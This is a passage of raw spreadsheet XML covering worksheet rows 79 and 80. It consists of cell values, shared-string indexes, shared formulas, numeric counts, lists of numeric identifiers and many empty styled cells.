      <c r="FG79" s="111" t="s">
        <v>1478</v>
      </c>
      <c r="FH79" s="111">
        <v>2.0</v>
      </c>
      <c r="FI79" s="111">
        <v>78.0</v>
      </c>
      <c r="FJ79" s="111" t="s">
        <v>1477</v>
      </c>
      <c r="FK79" s="111" t="s">
        <v>385</v>
      </c>
      <c r="FL79" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2101917, 2002749, 2002752, 2100528, 1917</v>
      </c>
      <c r="FM79" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN79" s="111" t="s">
        <v>1477</v>
      </c>
      <c r="FO79" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP79" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ79" s="111">
        <v>0.0</v>
      </c>
      <c r="FR79" s="111">
        <v>0.0</v>
      </c>
      <c r="FS79" s="112">
        <v>2.0</v>
      </c>
      <c r="FT79" s="112">
        <v>21711.0</v>
      </c>
      <c r="FU79" s="112">
        <v>18493.0</v>
      </c>
      <c r="FV79" s="112">
        <v>8.0</v>
      </c>
      <c r="FW79" s="112">
        <v>21868.0</v>
      </c>
      <c r="FX79" s="112">
        <v>21868.0</v>
      </c>
      <c r="FY79" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ79" s="112">
        <v>0.0</v>
      </c>
      <c r="GA79" s="112">
        <v>0.0</v>
      </c>
      <c r="GB79" s="112">
        <v>0.0</v>
      </c>
      <c r="GC79" s="112">
        <v>72.0</v>
      </c>
      <c r="GD79" s="112">
        <v>78.0</v>
      </c>
      <c r="GE79" s="112">
        <v>8.0</v>
      </c>
      <c r="GF79" s="112">
        <v>70.0</v>
      </c>
      <c r="GG79" s="112">
        <v>78.0</v>
      </c>
      <c r="GH79" s="113">
        <f t="shared" si="139"/>
        <v>21711</v>
      </c>
      <c r="GI79" s="113">
        <f t="shared" si="140"/>
        <v>72</v>
      </c>
      <c r="GJ79" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK79" s="113">
        <f t="shared" si="142"/>
        <v>18493</v>
      </c>
      <c r="GL79" s="113">
        <f t="shared" si="143"/>
        <v>78</v>
      </c>
      <c r="GM79" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN79" s="113">
        <f t="shared" si="145"/>
        <v>21868</v>
      </c>
      <c r="GO79" s="113">
        <f t="shared" si="146"/>
        <v>78</v>
      </c>
      <c r="GP79" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ79" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR79" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS79" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT79" s="94" t="s">
        <v>1479</v>
      </c>
      <c r="GU79" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV79" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW79" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF79" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG79" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH79" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI79" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ79" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK79" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL79" s="93">
        <v>2.0</v>
      </c>
      <c r="HM79" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN79" s="93">
        <v>0.0</v>
      </c>
      <c r="HO79" s="93">
        <v>0.0</v>
      </c>
      <c r="HP79" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ79" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR79" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS79" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT79" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU79" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV79" s="119" t="s">
        <v>1480</v>
      </c>
      <c r="HW79" s="119">
        <v>2.0</v>
      </c>
      <c r="HX79" s="119">
        <v>2.0</v>
      </c>
      <c r="HY79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC79" s="120" t="str">
        <f>HV79</f>
        <v>56049, 56538</v>
      </c>
      <c r="ID79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF79" s="120" t="s">
        <v>1480</v>
      </c>
      <c r="IG79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH79" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II79" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ79" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK79" s="99">
        <v>0.0</v>
      </c>
      <c r="IL79" s="99">
        <v>0.0</v>
      </c>
      <c r="IM79" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN79" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO79" s="98">
        <v>0.0</v>
      </c>
      <c r="IP79" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ79" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR79" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS79" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT79" s="127"/>
      <c r="IU79" s="127"/>
      <c r="IV79" s="127"/>
      <c r="IW79" s="127"/>
      <c r="IX79" s="127"/>
      <c r="IY79" s="127"/>
      <c r="IZ79" s="127"/>
      <c r="JA79" s="127"/>
      <c r="JB79" s="127"/>
      <c r="JC79" s="127"/>
      <c r="JD79" s="127"/>
      <c r="JE79" s="127"/>
      <c r="JF79" s="127"/>
      <c r="JG79" s="127"/>
      <c r="JH79" s="127"/>
      <c r="JI79" s="127"/>
      <c r="JJ79" s="127"/>
      <c r="JK79" s="127"/>
      <c r="JL79" s="127"/>
      <c r="JM79" s="127"/>
      <c r="JN79" s="127"/>
      <c r="JO79" s="127"/>
      <c r="JP79" s="127"/>
      <c r="JQ79" s="127"/>
      <c r="JR79" s="127"/>
      <c r="JS79" s="127"/>
      <c r="JT79" s="127"/>
      <c r="JU79" s="127"/>
      <c r="JV79" s="127"/>
      <c r="JW79" s="127"/>
      <c r="JX79" s="127"/>
      <c r="JY79" s="127"/>
      <c r="JZ79" s="127"/>
      <c r="KA79" s="127"/>
      <c r="KB79" s="127"/>
      <c r="KC79" s="127"/>
      <c r="KD79" s="127"/>
      <c r="KE79" s="127"/>
      <c r="KF79" s="127"/>
      <c r="KG79" s="127"/>
      <c r="KH79" s="127"/>
      <c r="KI79" s="127"/>
      <c r="KJ79" s="127"/>
      <c r="KK79" s="127"/>
      <c r="KL79" s="127"/>
      <c r="KM79" s="127"/>
      <c r="KN79" s="127"/>
      <c r="KO79" s="127"/>
      <c r="KP79" s="127"/>
      <c r="KQ79" s="127"/>
      <c r="KR79" s="127"/>
      <c r="KS79" s="127"/>
      <c r="KT79" s="127"/>
      <c r="KU79" s="127"/>
      <c r="KV79" s="127"/>
      <c r="KW79" s="127"/>
      <c r="KX79" s="127"/>
      <c r="KY79" s="127"/>
      <c r="KZ79" s="127"/>
      <c r="LA79" s="127"/>
      <c r="LB79" s="127"/>
      <c r="LC79" s="127"/>
      <c r="LD79" s="127"/>
      <c r="LE79" s="127"/>
      <c r="LF79" s="127"/>
      <c r="LG79" s="127"/>
      <c r="LH79" s="127"/>
      <c r="LI79" s="127"/>
      <c r="LJ79" s="127"/>
      <c r="LK79" s="127"/>
      <c r="LL79" s="127"/>
      <c r="LM79" s="127"/>
      <c r="LN79" s="127"/>
      <c r="LO79" s="127"/>
      <c r="LP79" s="127"/>
      <c r="LQ79" s="127"/>
      <c r="LR79" s="127"/>
      <c r="LS79" s="127"/>
      <c r="LT79" s="127"/>
      <c r="LU79" s="127"/>
      <c r="LV79" s="127"/>
      <c r="LW79" s="127"/>
      <c r="LX79" s="127"/>
      <c r="LY79" s="127"/>
      <c r="LZ79" s="127"/>
      <c r="MA79" s="127"/>
      <c r="MB79" s="127"/>
      <c r="MC79" s="127"/>
      <c r="MD79" s="127"/>
      <c r="ME79" s="127"/>
      <c r="MF79" s="127"/>
      <c r="MG79" s="127"/>
      <c r="MH79" s="127"/>
      <c r="MI79" s="127"/>
      <c r="MJ79" s="127"/>
      <c r="MK79" s="127"/>
      <c r="ML79" s="127"/>
      <c r="MM79" s="127"/>
      <c r="MN79" s="127"/>
      <c r="MO79" s="127"/>
      <c r="MP79" s="127"/>
      <c r="MQ79" s="127"/>
      <c r="MR79" s="127"/>
      <c r="MS79" s="127"/>
      <c r="MT79" s="127"/>
      <c r="MU79" s="127"/>
      <c r="MV79" s="127"/>
      <c r="MW79" s="127"/>
      <c r="MX79" s="127"/>
      <c r="MY79" s="127"/>
      <c r="MZ79" s="127"/>
      <c r="NA79" s="127"/>
      <c r="NB79" s="127"/>
      <c r="NC79" s="127"/>
      <c r="ND79" s="127"/>
      <c r="NE79" s="127"/>
      <c r="NF79" s="127"/>
      <c r="NG79" s="127"/>
      <c r="NH79" s="127"/>
      <c r="NI79" s="127"/>
      <c r="NJ79" s="127"/>
      <c r="NK79" s="127"/>
      <c r="NL79" s="127"/>
      <c r="NM79" s="127"/>
      <c r="NN79" s="127"/>
      <c r="NO79" s="127"/>
      <c r="NP79" s="127"/>
      <c r="NQ79" s="127"/>
      <c r="NR79" s="127"/>
      <c r="NS79" s="127"/>
      <c r="NT79" s="127"/>
      <c r="NU79" s="127"/>
      <c r="NV79" s="127"/>
      <c r="NW79" s="127"/>
      <c r="NX79" s="127"/>
      <c r="NY79" s="127"/>
    </row>
    <row r="80" ht="153.75" customHeight="1">
      <c r="B80" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C80" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D80" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E80" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F80" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G80" s="91" t="s">
        <v>1461</v>
      </c>
      <c r="H80" s="90" t="s">
        <v>1462</v>
      </c>
      <c r="I80" s="92" t="s">
        <v>1481</v>
      </c>
      <c r="J80" s="92" t="s">
        <v>508</v>
      </c>
      <c r="K80" s="92" t="s">
        <v>1482</v>
      </c>
      <c r="L80" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M80" s="93">
        <v>1.0</v>
      </c>
      <c r="N80" s="93">
        <v>1.0</v>
      </c>
      <c r="O80" s="93">
        <v>0.0</v>
      </c>
      <c r="P80" s="93">
        <v>1.0</v>
      </c>
      <c r="Q80" s="93">
        <v>1.0</v>
      </c>
      <c r="R80" s="93">
        <v>1.0</v>
      </c>
      <c r="S80" s="93">
        <v>0.0</v>
      </c>
      <c r="T80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U80" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V80" s="96" t="s">
        <v>1483</v>
      </c>
      <c r="W80" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X80" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y80" s="96" t="s">
        <v>1466</v>
      </c>
      <c r="Z80" s="126" t="s">
        <v>1467</v>
      </c>
      <c r="AA80" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB80" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC80" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD80" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE80" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF80" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG80" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH80" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI80" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ80" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL80" s="100">
        <v>0.0</v>
      </c>
      <c r="AM80" s="100">
        <v>0.0</v>
      </c>
      <c r="AN80" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP80" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ80" s="100">
        <v>0.0</v>
      </c>
      <c r="AR80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT80" s="100" t="str">
        <f t="shared" si="149"/>
        <v>-</v>
      </c>
      <c r="AU80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX80" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY80" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ80" s="100">
        <v>0.0</v>
      </c>
      <c r="BA80" s="102">
        <v>1074379.0</v>
      </c>
      <c r="BB80" s="102">
        <v>0.0</v>
      </c>
      <c r="BC80" s="102">
        <v>0.0</v>
      </c>
      <c r="BD80" s="102">
        <v>0.0</v>
      </c>
      <c r="BE80" s="102">
        <v>0.0</v>
      </c>
      <c r="BF80" s="102">
        <v>0.0</v>
      </c>
      <c r="BG80" s="102">
        <v>0.0</v>
      </c>
      <c r="BH80" s="102">
        <v>0.0</v>
      </c>
      <c r="BI80" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ80" s="102">
        <v>0.0</v>
      </c>
      <c r="BK80" s="102">
        <v>0.0</v>
      </c>
      <c r="BL80" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM80" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN80" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO80" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP80" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ80" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR80" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS80" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT80" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU80" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV80" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW80" s="104" t="s">
        <v>1484</v>
      </c>
      <c r="BX80" s="104">
        <v>4.0</v>
      </c>
      <c r="BY80" s="104">
        <v>2308.0</v>
      </c>
      <c r="BZ80" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA80" s="104" t="s">
        <v>1484</v>
      </c>
      <c r="CB80" s="104">
        <v>4.0</v>
      </c>
      <c r="CC80" s="104">
        <v>2308.0</v>
      </c>
      <c r="CD80" s="104" t="s">
        <v>1485</v>
      </c>
      <c r="CE80" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF80" s="104" t="str">
        <f t="shared" si="153"/>
        <v>2016877, 2016870, 2050746</v>
      </c>
      <c r="CG80" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH80" s="104" t="s">
        <v>1485</v>
      </c>
      <c r="CI80" s="104">
        <v>2014153.0</v>
      </c>
      <c r="CJ80" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK80" s="104">
        <v>1.0</v>
      </c>
      <c r="CL80" s="104">
        <v>540.0</v>
      </c>
      <c r="CM80" s="105">
        <v>1074379.0</v>
      </c>
      <c r="CN80" s="105">
        <v>2300.0</v>
      </c>
      <c r="CO80" s="105">
        <v>2308.0</v>
      </c>
      <c r="CP80" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ80" s="105">
        <v>2308.0</v>
      </c>
      <c r="CR80" s="105">
        <v>2308.0</v>
      </c>
      <c r="CS80" s="105">
        <v>1.0</v>
      </c>
      <c r="CT80" s="105">
        <v>0.0</v>
      </c>
      <c r="CU80" s="105">
        <v>1.0</v>
      </c>
      <c r="CV80" s="105">
        <v>1.0</v>
      </c>
      <c r="CW80" s="105">
        <v>2300.0</v>
      </c>
      <c r="CX80" s="105">
        <v>2308.0</v>
      </c>
      <c r="CY80" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ80" s="105">
        <v>2308.0</v>
      </c>
      <c r="DA80" s="105">
        <v>2308.0</v>
      </c>
      <c r="DB80" s="106">
        <f t="shared" si="122"/>
        <v>2300</v>
      </c>
      <c r="DC80" s="106">
        <f t="shared" si="123"/>
        <v>2300</v>
      </c>
      <c r="DD80" s="106">
        <f t="shared" si="124"/>
        <v>1</v>
      </c>
      <c r="DE80" s="106">
        <f t="shared" si="125"/>
        <v>2308</v>
      </c>
      <c r="DF80" s="106">
        <f t="shared" si="126"/>
        <v>2308</v>
      </c>
      <c r="DG80" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH80" s="106">
        <f t="shared" si="127"/>
        <v>2308</v>
      </c>
      <c r="DI80" s="106">
        <f t="shared" si="128"/>
        <v>2308</v>
      </c>
      <c r="DJ80" s="106">
        <f t="shared" si="129"/>
        <v>1</v>
      </c>
      <c r="DK80" s="107">
        <f t="shared" si="104"/>
        <v>1</v>
      </c>
      <c r="DL80" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM80" s="108" t="s">
        <v>1486</v>
      </c>
      <c r="DN80" s="108">
        <v>5.0</v>
      </c>
      <c r="DO80" s="108">
        <v>1076671.0</v>
      </c>
      <c r="DP80" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ80" s="108" t="s">
        <v>1486</v>
      </c>
      <c r="DR80" s="108">
        <v>5.0</v>
      </c>
      <c r="DS80" s="108">
        <v>1076671.0</v>
      </c>
      <c r="DT80" s="108" t="s">
        <v>1487</v>
      </c>
      <c r="DU80" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV80" s="108" t="str">
        <f t="shared" si="154"/>
        <v>50447, 2016877, 2016870, 2050746</v>
      </c>
      <c r="DW80" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX80" s="108" t="s">
        <v>1487</v>
      </c>
      <c r="DY80" s="108">
        <v>2014153.0</v>
      </c>
      <c r="DZ80" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA80" s="108">
        <v>1.0</v>
      </c>
      <c r="EB80" s="108">
        <v>540.0</v>
      </c>
      <c r="EC80" s="109">
        <v>1074379.0</v>
      </c>
      <c r="ED80" s="109">
        <v>2300.0</v>
      </c>
      <c r="EE80" s="109">
        <v>2309.0</v>
      </c>
      <c r="EF80" s="109">
        <v>1074363.0</v>
      </c>
      <c r="EG80" s="109">
        <v>2308.0</v>
      </c>
      <c r="EH80" s="109">
        <v>1076671.0</v>
      </c>
      <c r="EI80" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ80" s="109">
        <v>0.0</v>
      </c>
      <c r="EK80" s="109">
        <v>1.0</v>
      </c>
      <c r="EL80" s="109">
        <v>1.0</v>
      </c>
      <c r="EM80" s="109">
        <v>2300.0</v>
      </c>
      <c r="EN80" s="109">
        <v>2309.0</v>
      </c>
      <c r="EO80" s="109">
        <v>1074363.0</v>
      </c>
      <c r="EP80" s="109">
        <v>2308.0</v>
      </c>
      <c r="EQ80" s="109">
        <v>1076671.0</v>
      </c>
      <c r="ER80" s="110">
        <f t="shared" si="130"/>
        <v>2300</v>
      </c>
      <c r="ES80" s="110">
        <f t="shared" si="131"/>
        <v>2300</v>
      </c>
      <c r="ET80" s="110">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="EU80" s="110">
        <f t="shared" si="133"/>
        <v>2309</v>
      </c>
      <c r="EV80" s="110">
        <f t="shared" si="134"/>
        <v>2309</v>
      </c>
      <c r="EW80" s="110">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="EX80" s="110">
        <f t="shared" si="136"/>
        <v>1076671</v>
      </c>
      <c r="EY80" s="110">
        <f t="shared" si="137"/>
        <v>1076671</v>
      </c>
      <c r="EZ80" s="110">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="FA80" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB80" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC80" s="111" t="s">
        <v>1488</v>
      </c>
      <c r="FD80" s="111">
        <v>11.0</v>
      </c>
      <c r="FE80" s="111">
        <v>1345530.0</v>
      </c>
      <c r="FF80" s="101" t="s">
        <v>423</v>
      </c>
      <c r="FG80" s="111" t="s">
        <v>1489</v>
      </c>
      <c r="FH80" s="111">
        <v>9.0</v>
      </c>
      <c r="FI80" s="111">
        <v>1345422.0</v>
      </c>
      <c r="FJ80" s="111" t="s">
        <v>1488</v>
      </c>
      <c r="FK80" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL80" s="111" t="str">
        <f t="shared" si="155"/>
        <v>50447, 2016877, 2016870, 2014153, 2002752, 2002749, 2003394, 2015529, 2015526, 2002828, 2002829 </v>
      </c>
      <c r="FM80" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN80" s="111" t="s">
        <v>1490</v>
      </c>
      <c r="FO80" s="111">
        <v>2014153.0</v>
      </c>
      <c r="FP80" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ80" s="111">
        <v>1.0</v>
      </c>
      <c r="FR80" s="111">
        <v>540.0</v>
      </c>
      <c r="FS80" s="112">
        <v>1074379.0</v>
      </c>
      <c r="FT80" s="112">
        <v>59028.0</v>
      </c>
      <c r="FU80" s="112">
        <v>69410.0</v>
      </c>
      <c r="FV80" s="112">
        <v>1074363.0</v>
      </c>
      <c r="FW80" s="112">
        <v>271167.0</v>
      </c>
      <c r="FX80" s="112">
        <v>1345530.0</v>
      </c>
      <c r="FY80" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ80" s="112">
        <v>0.0</v>
      </c>
      <c r="GA80" s="112">
        <v>1.0</v>
      </c>
      <c r="GB80" s="112">
        <v>1.0</v>
      </c>
      <c r="GC80" s="112">
        <v>58969.0</v>
      </c>
      <c r="GD80" s="112">
        <v>69311.0</v>
      </c>
      <c r="GE80" s="112">
        <v>1074363.0</v>
      </c>
      <c r="GF80" s="112">
        <v>271059.0</v>
      </c>
      <c r="GG80" s="112">
        <v>1345422.0</v>
      </c>
      <c r="GH80" s="113">
        <f t="shared" si="139"/>
        <v>59028</v>
      </c>
      <c r="GI80" s="113">
        <f t="shared" si="140"/>
        <v>58969</v>
      </c>
      <c r="GJ80" s="113">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="GK80" s="113">
        <f t="shared" si="142"/>
        <v>69410</v>
      </c>
      <c r="GL80" s="113">
        <f t="shared" si="143"/>
        <v>69311</v>
      </c>
      <c r="GM80" s="113">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="GN80" s="113">
        <f t="shared" si="145"/>
        <v>1345530</v>
      </c>
      <c r="GO80" s="113">
        <f t="shared" si="146"/>
        <v>1345422</v>
      </c>
      <c r="GP80" s="113">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="GQ80" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR80" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS80" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT80" s="94"/>
      <c r="GU80" s="116">
        <v>30952.0</v>
      </c>
      <c r="GV80" s="116">
        <v>1.0</v>
      </c>
      <c r="GW80" s="116">
        <v>1073661.0</v>
      </c>
      <c r="GX80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD80" s="131">
        <v>30952.0</v>
      </c>
      <c r="HE80" s="131">
        <v>30952.0</v>
      </c>
      <c r="HF80" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG80" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH80" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI80" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ80" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK80" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL80" s="93">
        <v>514819.0</v>
      </c>
      <c r="HM80" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN80" s="93">
        <v>1.0</v>
      </c>
      <c r="HO80" s="93">
        <v>0.0</v>
      </c>
      <c r="HP80" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ80" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR80" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS80" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT80" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU80" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV80" s="119" t="s">
        <v>1491</v>
      </c>
      <c r="HW80" s="119">
        <v>4.0</v>
      </c>
      <c r="HX80" s="119">
        <v>22559.0</v>
      </c>
      <c r="HY80" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ80" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA80" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB80" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC80" s="120" t="s">
        <v>1492</v>
      </c>
      <c r="ID80" s="120" t="s">
        <v>1493</v>
      </c>
      <c r="IE80" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF80" s="120">
        <v>14984.0</v>
      </c>
      <c r="IG80" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH80" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II80" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ80" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK80" s="99">
        <v>31071.0</v>
      </c>
      <c r="IL80" s="99">
        <v>1.0</v>
      </c>
      <c r="IM80" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN80" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO80" s="98">
        <v>1.0</v>
      </c>
      <c r="IP80" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ80" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR80" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS80" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT80" s="127"/>
      <c r="IU80" s="127"/>
      <c r="IV80" s="127"/>
      <c r="IW80" s="127"/>
      <c r="IX80" s="127"/>
      <c r="IY80" s="127"/>
      <c r="IZ80" s="127"/>
      <c r="JA80" s="127"/>
      <c r="JB80" s="127"/>
      <c r="JC80" s="127"/>
      <c r="JD80" s="127"/>
      <c r="JE80" s="127"/>
      <c r="JF80" s="127"/>
      <c r="JG80" s="127"/>
      <c r="JH80" s="127"/>
      <c r="JI80" s="127"/>
      <c r="JJ80" s="127"/>
      <c r="JK80" s="127"/>
      <c r="JL80" s="127"/>
      <c r="JM80" s="127"/>
      <c r="JN80" s="127"/>
      <c r="JO80" s="127"/>
      <c r="JP80" s="127"/>
      <c r="JQ80" s="127"/>
      <c r="JR80" s="127"/>
      <c r="JS80" s="127"/>
      <c r="JT80" s="127"/>
      <c r="JU80" s="127"/>
      <c r="JV80" s="127"/>
      <c r="JW80" s="127"/>
      <c r="JX80" s="127"/>
      <c r="JY80" s="127"/>
      <c r="JZ80" s="127"/>
      <c r="KA80" s="127"/>
      <c r="KB80" s="127"/>
      <c r="KC80" s="127"/>
      <c r="KD80" s="127"/>
      <c r="KE80" s="127"/>
      <c r="KF80" s="127"/>
      <c r="KG80" s="127"/>
      <c r="KH80" s="127"/>
      <c r="KI80" s="127"/>
      <c r="KJ80" s="127"/>
      <c r="KK80" s="127"/>
      <c r="KL80" s="127"/>
      <c r="KM80" s="127"/>
      <c r="KN80" s="127"/>
      <c r="KO80" s="127"/>
      <c r="KP80" s="127"/>
      <c r="KQ80" s="127"/>
      <c r="KR80" s="127"/>
      <c r="KS80" s="127"/>
      <c r="KT80" s="127"/>
      <c r="KU80" s="127"/>
